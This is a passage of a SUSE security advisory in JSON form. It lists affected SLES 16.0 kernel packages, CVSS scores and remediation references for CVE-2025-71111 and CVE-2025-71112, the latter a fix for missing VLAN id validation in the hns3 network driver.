"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-71111"
},
{
"cve": "CVE-2025-71112",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71112"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: hns3: add VLAN id validation before using\n\nCurrently, the VLAN id may be used without validation when\nreceive a VLAN configuration mailbox from VF. The length of\nvlan_del_fail_bmap is BITS_TO_LONGS(VLAN_N_VID). It may cause\nout-of-bounds memory access once the VLAN id is bigger than\nor equal to VLAN_N_VID.\n\nTherefore, VLAN id needs to be checked to ensure it is within\nthe range of VLAN_N_VID.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71112",
"url": "https://www.suse.com/security/cve/CVE-2025-71112"
},
{
"category": "external",
"summary": "SUSE Bug 1256726 for CVE-2025-71112",
"url": "https://bugzilla.suse.com/1256726"
},
{
"category": "external",
"summary": "SUSE Bug 1256727 for CVE-2025-71112",
"url": "https://bugzilla.suse.com/1256727"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
